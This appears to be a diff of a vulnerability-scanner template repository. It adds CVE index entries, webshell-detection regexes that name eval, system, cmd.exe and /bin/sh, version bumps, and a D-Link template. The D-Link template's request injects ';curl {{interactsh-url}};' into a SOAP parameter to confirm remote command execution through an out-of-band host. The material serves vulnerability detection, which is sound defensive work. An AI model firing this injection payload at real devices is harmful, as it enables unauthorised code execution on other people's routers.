{"ID":"CVE-2023-26842","Info":{"Name":"ChurchCRM 4.5.3 - Cross-Site Scripting","Severity":"medium","Description":"A stored Cross-site scripting (XSS) vulnerability in ChurchCRM 4.5.3 allows remote attackers to inject arbitrary web script or HTML via the OptionManager.php.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2023/CVE-2023-26842.yaml"}
{"ID":"CVE-2023-26843","Info":{"Name":"ChurchCRM 4.5.3 - Cross-Site Scripting","Severity":"medium","Description":"A stored Cross-site scripting (XSS) vulnerability in ChurchCRM 4.5.3 allows remote attackers to inject arbitrary web script or HTML via the NoteEditor.php.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2023/CVE-2023-26843.yaml"}
{"ID":"CVE-2023-27008","Info":{"Name":"ATutor \u003c 2.2.1 - Cross Site Scripting","Severity":"medium","Description":"ATutor \u003c 2.2.1 was discovered with a vulnerability, a reflected cross-site scripting (XSS), in ATtutor 2.2.1 via token body parameter.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-27008.yaml"} {"ID":"CVE-2023-27008","Info":{"Name":"ATutor \u003c 2.2.1 - Cross Site Scripting","Severity":"medium","Description":"ATutor \u003c 2.2.1 was discovered with a vulnerability, a reflected cross-site scripting (XSS), in ATtutor 2.2.1 via token body parameter.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-27008.yaml"}
{"ID":"CVE-2023-27159","Info":{"Name":"Appwrite \u003c=1.2.1 - Server-Side Request Forgery","Severity":"medium","Description":"Appwrite through 1.2.1 is susceptible to server-side request forgery via the component /v1/avatars/favicon. An attacker can potentially access network resources and sensitive information via a crafted GET request, thereby also making it possible to modify data and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2023/CVE-2023-27159.yaml"} {"ID":"CVE-2023-27159","Info":{"Name":"Appwrite \u003c=1.2.1 - Server-Side Request Forgery","Severity":"medium","Description":"Appwrite through 1.2.1 is susceptible to server-side request forgery via the component /v1/avatars/favicon. An attacker can potentially access network resources and sensitive information via a crafted GET request, thereby also making it possible to modify data and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2023/CVE-2023-27159.yaml"}
{"ID":"CVE-2023-27179","Info":{"Name":"GDidees CMS v3.9.1 - Arbitrary File Download","Severity":"critical","Description":"GDidees CMS v3.9.1 and lower was discovered to contain an arbitrary file download vulenrability via the filename parameter at /_admin/imgdownload.php.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-27179.yaml"} {"ID":"CVE-2023-27179","Info":{"Name":"GDidees CMS v3.9.1 - Arbitrary File Download","Severity":"critical","Description":"GDidees CMS v3.9.1 and lower was discovered to contain an arbitrary file download vulenrability via the filename parameter at /_admin/imgdownload.php.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-27179.yaml"}
{"ID":"CVE-2023-27292","Info":{"Name":"OpenCATS - Open Redirect","Severity":"medium","Description":"OpenCATS contains an open redirect vulnerability due to improper validation of user-supplied GET parameters. This, in turn, exposes OpenCATS to possible template injection and obtaining sensitive information, modifying data, and/or executing unauthorized operations.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2023/CVE-2023-27292.yaml"} {"ID":"CVE-2023-27292","Info":{"Name":"OpenCATS - Open Redirect","Severity":"medium","Description":"OpenCATS contains an open redirect vulnerability due to improper validation of user-supplied GET parameters. This, in turn, exposes OpenCATS to possible template injection and obtaining sensitive information, modifying data, and/or executing unauthorized operations.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2023/CVE-2023-27292.yaml"}
{"ID":"CVE-2023-2732","Info":{"Name":"MStore API \u003c= 3.9.2 - Authentication Bypass","Severity":"critical","Description":"The MStore API plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 3.9.2. This is due to insufficient verification on the user being supplied during the add listing REST API request through the plugin. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the user id.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-2732.yaml"} {"ID":"CVE-2023-2732","Info":{"Name":"MStore API \u003c= 3.9.2 - Authentication Bypass","Severity":"critical","Description":"The MStore API plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 3.9.2. This is due to insufficient verification on the user being supplied during the add listing REST API request through the plugin. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the user id.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-2732.yaml"}
{"ID":"CVE-2023-27350","Info":{"Name":"PaperCut - Unauthenticated Remote Code Execution","Severity":"critical","Description":"This vulnerability allows remote attackers to bypass authentication on affected installations of PaperCut NG 22.0.5 (Build 63914). Authentication is not required to exploit this vulnerability. The specific flaw exists within the SetupCompleted class. The issue results from improper access control. An attacker can leverage this vulnerability to bypass authentication and execute arbitrary code in the context of SYSTEM. Was ZDI-CAN-18987.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-27350.yaml"} {"ID":"CVE-2023-27350","Info":{"Name":"PaperCut - Unauthenticated Remote Code Execution","Severity":"critical","Description":"This vulnerability allows remote attackers to bypass authentication on affected installations of PaperCut NG 22.0.5 (Build 63914). Authentication is not required to exploit this vulnerability. The specific flaw exists within the SetupCompleted class. The issue results from improper access control. An attacker can leverage this vulnerability to bypass authentication and execute arbitrary code in the context of SYSTEM. Was ZDI-CAN-18987.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-27350.yaml"}
{"ID":"CVE-2023-27372","Info":{"Name":"SPIP - Remote Command Execution","Severity":"critical","Description":"SPIP before 4.2.1 allows Remote Code Execution via form values in the public area because serialization is mishandled. The fixed versions are 3.2.18, 4.0.10, 4.1.8, and 4.2.1.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-27372.yaml"}
{"ID":"CVE-2023-27482","Info":{"Name":"Home Assistant Supervisor - Authentication Bypass","Severity":"critical","Description":"Home Assistant Supervisor is an open source home automation tool. A remotely exploitable vulnerability bypassing authentication for accessing the Supervisor API through Home Assistant has been discovered.This impacts all Home Assistant installation types that use the Supervisor 2023.01.1 or older. Installation types, like Home Assistant Container (for example Docker), or Home Assistant Core manually in a Python environment, are not affected.\n","Classification":{"CVSSScore":"10.0"}},"file_path":"http/cves/2023/CVE-2023-27482.yaml"} {"ID":"CVE-2023-27482","Info":{"Name":"Home Assistant Supervisor - Authentication Bypass","Severity":"critical","Description":"Home Assistant Supervisor is an open source home automation tool. A remotely exploitable vulnerability bypassing authentication for accessing the Supervisor API through Home Assistant has been discovered.This impacts all Home Assistant installation types that use the Supervisor 2023.01.1 or older. Installation types, like Home Assistant Container (for example Docker), or Home Assistant Core manually in a Python environment, are not affected.\n","Classification":{"CVSSScore":"10.0"}},"file_path":"http/cves/2023/CVE-2023-27482.yaml"}
{"ID":"CVE-2023-27524","Info":{"Name":"Apache Superset - Authentication Bypass","Severity":"high","Description":"Session Validation attacks in Apache Superset versions up to and including 2.0.1. Installations that have not altered the default configured SECRET_KEY according to installation instructions allow for an attacker to authenticate and access unauthorized resources. This does not affect Superset administrators who have changed the default value for SECRET_KEY config.","Classification":{"CVSSScore":"8.9"}},"file_path":"http/cves/2023/CVE-2023-27524.yaml"} {"ID":"CVE-2023-27524","Info":{"Name":"Apache Superset - Authentication Bypass","Severity":"high","Description":"Session Validation attacks in Apache Superset versions up to and including 2.0.1. Installations that have not altered the default configured SECRET_KEY according to installation instructions allow for an attacker to authenticate and access unauthorized resources. This does not affect Superset administrators who have changed the default value for SECRET_KEY config.","Classification":{"CVSSScore":"8.9"}},"file_path":"http/cves/2023/CVE-2023-27524.yaml"}
{"ID":"CVE-2023-27587","Info":{"Name":"ReadToMyShoe - Generation of Error Message Containing Sensitive Information","Severity":"medium","Description":"ReadToMyShoe generates an error message containing sensitive information prior to commit 8533b01. If an error occurs when adding an article, the website shows the user an error message. If the error originates from the Google Cloud TTS request, it will include the full URL of the request, which contains the Google Cloud API key.\n","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2023/CVE-2023-27587.yaml"} {"ID":"CVE-2023-27587","Info":{"Name":"ReadToMyShoe - Generation of Error Message Containing Sensitive Information","Severity":"medium","Description":"ReadToMyShoe generates an error message containing sensitive information prior to commit 8533b01. If an error occurs when adding an article, the website shows the user an error message. If the error originates from the Google Cloud TTS request, it will include the full URL of the request, which contains the Google Cloud API key.\n","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2023/CVE-2023-27587.yaml"}
{"ID":"CVE-2023-2780","Info":{"Name":"Mlflow \u003c2.3.1 - Local File Inclusion Bypass","Severity":"critical","Description":"Path Traversal: '\\..\\filename' in GitHub repository mlflow/mlflow prior to 2.3.1.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-2780.yaml"} {"ID":"CVE-2023-2780","Info":{"Name":"Mlflow \u003c2.3.1 - Local File Inclusion Bypass","Severity":"critical","Description":"Path Traversal: '\\..\\filename' in GitHub repository mlflow/mlflow prior to 2.3.1.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-2780.yaml"}
{"ID":"CVE-2023-28121","Info":{"Name":"WooCommerce Payments - Unauthorized Admin Access","Severity":"critical","Description":"An issue in WooCommerce Payments plugin for WordPress (versions 5.6.1 and lower) allows an unauthenticated attacker to send requests on behalf of an elevated user, like administrator. This allows a remote, unauthenticated attacker to gain admin access on a site that has the affected version of the plugin activated.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-28121.yaml"}
{"ID":"CVE-2023-2825","Info":{"Name":"GitLab 16.0.0 - Path Traversal","Severity":"critical","Description":"An issue has been discovered in GitLab CE/EE affecting only version 16.0.0. An unauthenticated malicious user can use a path traversal vulnerability to read arbitrary files on the server when an attachment exists in a public project nested within at least five groups\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-2825.yaml"} {"ID":"CVE-2023-2825","Info":{"Name":"GitLab 16.0.0 - Path Traversal","Severity":"critical","Description":"An issue has been discovered in GitLab CE/EE affecting only version 16.0.0. An unauthenticated malicious user can use a path traversal vulnerability to read arbitrary files on the server when an attachment exists in a public project nested within at least five groups\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-2825.yaml"}
{"ID":"CVE-2023-28343","Info":{"Name":"Altenergy Power Control Software C1.2.5 - Remote Command Injection","Severity":"critical","Description":"Altenergy Power Control Software C1.2.5 is susceptible to remote command injection via shell metacharacters in the index.php/management/set_timezone parameter, because of set_timezone in models/management_model.php. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized operations without entering necessary credentials.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-28343.yaml"} {"ID":"CVE-2023-28343","Info":{"Name":"Altenergy Power Control Software C1.2.5 - Remote Command Injection","Severity":"critical","Description":"Altenergy Power Control Software C1.2.5 is susceptible to remote command injection via shell metacharacters in the index.php/management/set_timezone parameter, because of set_timezone in models/management_model.php. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized operations without entering necessary credentials.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-28343.yaml"}
{"ID":"CVE-2023-28432","Info":{"Name":"MinIO Cluster Deployment - Information Disclosure","Severity":"high","Description":"MinIO is susceptible to information disclosure. In a cluster deployment starting with RELEASE.2019-12-17T23-16-33Z and prior to RELEASE.2023-03-20T20-16-18Z, MinIO returns all environment variables, including MINIO_SECRET_KEY and MINIO_ROOT_PASSWORD. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized operations without entering necessary credentials. All users of distributed deployment are impacted.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-28432.yaml"} {"ID":"CVE-2023-28432","Info":{"Name":"MinIO Cluster Deployment - Information Disclosure","Severity":"high","Description":"MinIO is susceptible to information disclosure. In a cluster deployment starting with RELEASE.2019-12-17T23-16-33Z and prior to RELEASE.2023-03-20T20-16-18Z, MinIO returns all environment variables, including MINIO_SECRET_KEY and MINIO_ROOT_PASSWORD. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized operations without entering necessary credentials. All users of distributed deployment are impacted.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-28432.yaml"}
@ -1838,10 +1856,22 @@
{"ID":"CVE-2023-29919","Info":{"Name":"SolarView Compact \u003c= 6.00 - Local File Inclusion","Severity":"high","Description":"There is an arbitrary read file vulnerability in SolarView Compact 6.00 and below, attackers can bypass authentication to read files through texteditor.php\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-29919.yaml"} {"ID":"CVE-2023-29919","Info":{"Name":"SolarView Compact \u003c= 6.00 - Local File Inclusion","Severity":"high","Description":"There is an arbitrary read file vulnerability in SolarView Compact 6.00 and below, attackers can bypass authentication to read files through texteditor.php\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-29919.yaml"}
{"ID":"CVE-2023-29922","Info":{"Name":"PowerJob V4.3.1 - Authentication Bypass","Severity":"high","Description":"PowerJob V4.3.1 is vulnerable to Incorrect Access Control via the create user/save interface.\n","Classification":{"CVSSScore":"8.9"}},"file_path":"http/cves/2023/CVE-2023-29922.yaml"} {"ID":"CVE-2023-29922","Info":{"Name":"PowerJob V4.3.1 - Authentication Bypass","Severity":"high","Description":"PowerJob V4.3.1 is vulnerable to Incorrect Access Control via the create user/save interface.\n","Classification":{"CVSSScore":"8.9"}},"file_path":"http/cves/2023/CVE-2023-29922.yaml"}
{"ID":"CVE-2023-29923","Info":{"Name":"PowerJob \u003c=4.3.2 - Unauthenticated Access","Severity":"medium","Description":"PowerJob V4.3.1 is vulnerable to Insecure Permissions. via the list job interface.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-29923.yaml"} {"ID":"CVE-2023-29923","Info":{"Name":"PowerJob \u003c=4.3.2 - Unauthenticated Access","Severity":"medium","Description":"PowerJob V4.3.1 is vulnerable to Insecure Permissions. via the list job interface.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-29923.yaml"}
{"ID":"CVE-2023-30019","Info":{"Name":"Imgproxy \u003c= 3.14.0 - Server-side request forgery (SSRF)","Severity":"medium","Description":"imgproxy \u003c=3.14.0 is vulnerable to Server-Side Request Forgery (SSRF) due to a lack of sanitization of the imageURL parameter.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2023/CVE-2023-30019.yaml"}
{"ID":"CVE-2023-30210","Info":{"Name":"OURPHP \u003c= 7.2.0 - Cross Site Scripting","Severity":"medium","Description":"OURPHP \u003c= 7.2.0 is vulnerable to Cross Site Scripting (XSS) via /client/manage/ourphp_tz.php.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-30210.yaml"} {"ID":"CVE-2023-30210","Info":{"Name":"OURPHP \u003c= 7.2.0 - Cross Site Scripting","Severity":"medium","Description":"OURPHP \u003c= 7.2.0 is vulnerable to Cross Site Scripting (XSS) via /client/manage/ourphp_tz.php.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-30210.yaml"}
{"ID":"CVE-2023-30212","Info":{"Name":"OURPHP \u003c= 7.2.0 - Cross Site Scripting","Severity":"medium","Description":"OURPHP \u003c= 7.2.0 is vulnerale to Cross Site Scripting (XSS) via /client/manage/ourphp_out.php.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-30212.yaml"} {"ID":"CVE-2023-30212","Info":{"Name":"OURPHP \u003c= 7.2.0 - Cross Site Scripting","Severity":"medium","Description":"OURPHP \u003c= 7.2.0 is vulnerale to Cross Site Scripting (XSS) via /client/manage/ourphp_out.php.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-30212.yaml"}
{"ID":"CVE-2023-31059","Info":{"Name":"Repetier Server - Directory Traversal","Severity":"high","Description":"Repetier Server through 1.4.10 allows ..%5c directory traversal for reading files that contain credentials, as demonstrated by connectionLost.php.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-31059.yaml"} {"ID":"CVE-2023-31059","Info":{"Name":"Repetier Server - Directory Traversal","Severity":"high","Description":"Repetier Server through 1.4.10 allows ..%5c directory traversal for reading files that contain credentials, as demonstrated by connectionLost.php.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-31059.yaml"}
{"ID":"CVE-2023-31548","Info":{"Name":"ChurchCRM v4.5.3 - Cross-Site Scripting","Severity":"medium","Description":"A stored Cross-site scripting (XSS) vulnerability in the FundRaiserEditor.php component of ChurchCRM v4.5.3 allows attackers to execute arbitrary web scripts or HTML via a crafted payload.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2023/CVE-2023-31548.yaml"}
{"ID":"CVE-2023-32235","Info":{"Name":"Ghost CMS \u003c 5.42.1 - Path Traversal","Severity":"medium","Description":"Ghost before 5.42.1 allows remote attackers to read arbitrary files within the active theme's folder via /assets/built%2F..%2F..%2F/ directory traversal. This occurs in frontend/web/middleware/static-theme.js.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-32235.yaml"} {"ID":"CVE-2023-32235","Info":{"Name":"Ghost CMS \u003c 5.42.1 - Path Traversal","Severity":"medium","Description":"Ghost before 5.42.1 allows remote attackers to read arbitrary files within the active theme's folder via /assets/built%2F..%2F..%2F/ directory traversal. This occurs in frontend/web/middleware/static-theme.js.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-32235.yaml"}
{"ID":"CVE-2023-32243","Info":{"Name":"WordPress Elementor Lite 5.7.1 - Arbitrary Password Reset","Severity":"critical","Description":"Improper Authentication vulnerability in WPDeveloper Essential Addons for Elementor allows Privilege Escalation. This issue affects Essential Addons for Elementor: from 5.4.0 through 5.7.1.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-32243.yaml"} {"ID":"CVE-2023-32243","Info":{"Name":"WordPress Elementor Lite 5.7.1 - Arbitrary Password Reset","Severity":"critical","Description":"Improper Authentication vulnerability in WPDeveloper Essential Addons for Elementor allows Privilege Escalation. This issue affects Essential Addons for Elementor: from 5.4.0 through 5.7.1.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-32243.yaml"}
{"ID":"CVE-2023-32315","Info":{"Name":"Openfire Administration Console - Authentication Bypass","Severity":"high","Description":"Openfire is an XMPP server licensed under the Open Source Apache License. Openfire's administrative console, a web-based application, was found to be vulnerable to a path traversal attack via the setup environment. This permitted an unauthenticated user to use the unauthenticated Openfire Setup Environment in an already configured Openfire environment to access restricted pages in the Openfire Admin Console reserved for administrative users. This vulnerability affects all versions of Openfire that have been released since April 2015, starting with version 3.10.0.\n","Classification":{"CVSSScore":"8.6"}},"file_path":"http/cves/2023/CVE-2023-32315.yaml"} {"ID":"CVE-2023-32315","Info":{"Name":"Openfire Administration Console - Authentication Bypass","Severity":"high","Description":"Openfire is an XMPP server licensed under the Open Source Apache License. Openfire's administrative console, a web-based application, was found to be vulnerable to a path traversal attack via the setup environment. This permitted an unauthenticated user to use the unauthenticated Openfire Setup Environment in an already configured Openfire environment to access restricted pages in the Openfire Admin Console reserved for administrative users. This vulnerability affects all versions of Openfire that have been released since April 2015, starting with version 3.10.0.\n","Classification":{"CVSSScore":"8.6"}},"file_path":"http/cves/2023/CVE-2023-32315.yaml"}
{"ID":"CVE-2023-33510","Info":{"Name":"Jeecg P3 Biz Chat - Local File Inclusion","Severity":"high","Description":"Jeecg P3 Biz Chat 1.0.5 allows remote attackers to read arbitrary files through specific parameters.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-33510.yaml"}
{"ID":"CVE-2023-33568","Info":{"Name":"Dolibarr Unauthenticated Contacts Database Theft","Severity":"high","Description":"An issue in Dolibarr 16 before 16.0.5 allows unauthenticated attackers to perform a database dump and access a company's entire customer file, prospects, suppliers, and employee information if a contact file exists.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-33568.yaml"}
{"ID":"CVE-2023-34362","Info":{"Name":"MOVEit Transfer - Remote Code Execution","Severity":"critical","Description":"In Progress MOVEit Transfer before 2021.0.6 (13.0.6), 2021.1.4 (13.1.4), 2022.0.4 (14.0.4), 2022.1.5 (14.1.5), and 2023.0.1 (15.0.1), a SQL injection vulnerability has been found in the MOVEit Transfer web application that could allow an unauthenticated attacker to gain access to MOVEit Transfer's database. Depending on the database engine being used (MySQL, Microsoft SQL Server, or Azure SQL), an attacker may be able to infer information about the structure and contents of the database, and execute SQL statements that alter or delete database elements. NOTE: this is exploited in the wild in May and June 2023; exploitation of unpatched systems can occur via HTTP or HTTPS. All versions (e.g., 2020.0 and 2019x) before the five explicitly mentioned versions are affected, including older unsupported versions.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-34362.yaml"}
{"ID":"CVE-2023-34537","Info":{"Name":"Hoteldruid 3.0.5 - Cross-Site Scripting","Severity":"medium","Description":"A Reflected XSS was discovered in HotelDruid version 3.0.5, an attacker can issue malicious code/command on affected webpage's parameter to trick user on browser and/or exfiltrate data.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2023/CVE-2023-34537.yaml"}
{"ID":"CVE-2023-34598","Info":{"Name":"Gibbon v25.0.0 - Local File Inclusion","Severity":"high","Description":"Gibbon v25.0.0 is vulnerable to a Local File Inclusion (LFI) vulnerability where it's possible to include the content of several files present in the installation folder in the server's response.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-34598.yaml"}
{"ID":"CVE-2023-34599","Info":{"Name":"Gibbon v25.0.0 - Cross-Site Scripting","Severity":"medium","Description":"Multiple Cross-Site Scripting (XSS) vulnerabilities have been identified in Gibbon v25.0.0, which enable attackers to execute arbitrary Javascript code.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-34599.yaml"}
{"ID":"CVE-2023-34659","Info":{"Name":"JeecgBoot 3.5.0 - SQL Injection","Severity":"critical","Description":"jeecg-boot 3.5.0 and 3.5.1 have a SQL injection vulnerability the id parameter of the /jeecg-boot/jmreport/show interface.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-34659.yaml"}
{"ID":"CVE-2023-34843","Info":{"Name":"Traggo Server - Local File Inclusion","Severity":"high","Description":"traggo/server version 0.3.0 is vulnerable to directory traversal.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-34843.yaml"}
{"ID":"CVE-2023-34960","Info":{"Name":"Chamilo Command Injection","Severity":"high","Description":"","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-34960.yaml"} {"ID":"CVE-2023-34960","Info":{"Name":"Chamilo Command Injection","Severity":"high","Description":"","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-34960.yaml"}
{"ID":"CVE-2023-35843","Info":{"Name":"NocoDB version \u003c= 0.106.1 - Arbitrary File Read","Severity":"high","Description":"NocoDB through 0.106.1 has a path traversal vulnerability that allows an unauthenticated attacker to access arbitrary files on the server by manipulating the path parameter of the /download route. This vulnerability could allow an attacker to access sensitive files and data on the server, including configuration files, source code, and other sensitive information.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-35843.yaml"}
{"ID":"CVE-2023-35844","Info":{"Name":"Lightdash version \u003c= 0.510.3 Arbitrary File Read","Severity":"high","Description":"packages/backend/src/routers in Lightdash before 0.510.3\nhas insecure file endpoints, e.g., they allow .. directory\ntraversal and do not ensure that an intended file extension\n(.csv or .png) is used.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-35844.yaml"}

View File

@ -1 +1 @@
6a8d52a6e0f4ae54ace3ababe34a2385 b830e8b5ef413ec8d972848bd93b95d8

View File

@ -0,0 +1,33 @@
id: asp-webshell
info:
name: ASP/ASP.NET Webshell - Detect
author: lu4nx
severity: high
reference:
- https://github.com/tennc/webshell/tree/master/aspx
- https://github.com/tennc/webshell/tree/master/asp
- https://www.rapid7.com/blog/post/2016/12/14/webshells-101/
metadata:
verified: true
tags: asp,aspx,file,webshell
file:
- extensions:
- asp
- asa
- aspx
- ashx
- asmx
- asax
extractors:
- type: regex
regex:
- '(?i)(eval)'
- '(?i)(eval|execute)\('
- '(?i)wscript.shell'
- '(?i)ExecuteStatement'
- '(?i)cmd.exe'
- '(?i)mmshell'
- '(?i)GetCmd'

View File

@ -0,0 +1,28 @@
id: jsp-webshell
info:
name: JSP Webshell - Detect
author: lu4nx
severity: high
reference:
- https://github.com/tennc/webshell/tree/master/jsp
- https://github.com/tennc/webshell/tree/master/jspx
- https://www.rapid7.com/blog/post/2016/12/14/webshells-101/
metadata:
verified: true
tags: jsp,java,jspx,webshell,file
file:
- extensions:
- jsp
- java
- jspx
extractors:
- type: regex
regex:
- '(?i)(ClassLoader|exec|eval|ProcessBuilder|getInputStream|loadClass|defineClass|URLClassLoader)\('
- '(?i)cmd.exe'
- '(?i)/bin/sh'
- '(?i)/bin/bash'
- '(?i)exeCmd'

View File

@ -0,0 +1,33 @@
id: php-webshell
info:
name: PHP Webshell - Detect
author: lu4nx
severity: high
reference:
- https://github.com/tennc/webshell/tree/master/php
- https://www.rapid7.com/blog/post/2016/12/14/webshells-101/
metadata:
verified: true
tags: php,file,webshell
file:
- extensions:
- php
extractors:
- type: regex
regex:
- '(?i)\b(passthru|eval|exec|system|phpinfo|assert|call_user_func|call_user_func_array)\('
- '(?i)cmd.exe'
- '(?i)/bin/sh'
- '(?i)/bin/bash'
- '(?i)WScript.Shell'
- '(?i)gzuncompress\(base64_decode\('
- '\]\(\$_(GET|POST|COOKIE|REQUEST)\['
- '(?i)new\s*(ReflectionFunction|ReflectionClass)'
- '(?i)0x647261646e617473'
- '65786563' # exec
- '(?i)\$\w+\(\$_(GET|POST|COOKIE|REQUEST)'
- '(?i)b4tm4n'
- '(?i)cmdshell'

View File

@ -1 +1 @@
2.8.8 2.9.0

View File

@ -1 +1 @@
1.24.1 1.24.4

View File

@ -1 +1 @@
1.103.0 1.104.0

View File

@ -1 +1 @@
1.18.1 1.18.2

View File

@ -1 +1 @@
5.9.1 5.9.2

View File

@ -1 +1 @@
7.8.1 7.8.2

View File

@ -19,7 +19,7 @@ info:
max-request: 1 max-request: 1
verified: true verified: true
shodan-query: product:"Cisco IOS http config" && 200 shodan-query: product:"Cisco IOS http config" && 200
tags: cve,cve2001,cisco,ios,bypass tags: cve,cve2001,cisco,ios,auth-bypass
http: http:
- method: GET - method: GET

View File

@ -0,0 +1,43 @@
id: CVE-2018-6530
info:
name: D-Link - Unauthenticated Remote Code Execution
author: gy741
severity: critical
description: |
OS command injection vulnerability in soap.cgi (soapcgi_main in cgibin) in D-Link DIR-880L DIR-880L_REVA_FIRMWARE_PATCH_1.08B04 and previous versions, DIR-868L DIR868LA1_FW112b04 and previous versions, DIR-65L DIR-865L_REVA_FIRMWARE_PATCH_1.08.B01 and previous versions, and DIR-860L DIR860LA1_FW110b04 and previous versions allows remote attackers to execute arbitrary OS commands via the service parameter.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2018-6530
- https://github.com/soh0ro0t/Pwn-Multiple-Dlink-Router-Via-Soap-Proto
- https://www.cisa.gov/known-exploited-vulnerabilities-catalog
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 9.8
cve-id: CVE-2018-6530
cwe-id: CWE-78
metadata:
max-request: 1
tags: cve,cve2018,d-link,rce,oast,unauth
requests:
- raw:
- |
POST /soap.cgi?service=whatever-control;curl {{interactsh-url}};whatever-invalid-shell HTTP/1.1
Host: {{Hostname}}
Accept-Encoding: identity
SOAPAction: "whatever-serviceType#whatever-action"
Content-Type: text/xml
whatever-content
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"
- type: word
part: interactsh_request
words:
- "User-Agent: curl"

View File

@ -2,7 +2,7 @@ id: CVE-2023-24488
info: info:
name: Citrix Gateway and Citrix ADC - Cross-Site Scripting name: Citrix Gateway and Citrix ADC - Cross-Site Scripting
author: johnk3r author: johnk3r,DhiyaneshDk
severity: medium severity: medium
description: | description: |
Citrix ADC and Citrix Gateway versions before 13.1 and 13.1-45.61, 13.0 and 13.0-90.11, 12.1 and 12.1-65.35 contain a cross-site scripting vulnerability due to improper input validation. Citrix ADC and Citrix Gateway versions before 13.1 and 13.1-45.61, 13.0 and 13.0-90.11, 12.1 and 12.1-65.35 contain a cross-site scripting vulnerability due to improper input validation.
@ -11,25 +11,38 @@ info:
- https://blog.assetnote.io/2023/06/29/citrix-xss-advisory/ - https://blog.assetnote.io/2023/06/29/citrix-xss-advisory/
- https://nvd.nist.gov/vuln/detail/CVE-2023-24488 - https://nvd.nist.gov/vuln/detail/CVE-2023-24488
- https://twitter.com/infosec_au/status/1674786106381070342 - https://twitter.com/infosec_au/status/1674786106381070342
- https://twitter.com/bxmbn/status/1675250259608449026
classification: classification:
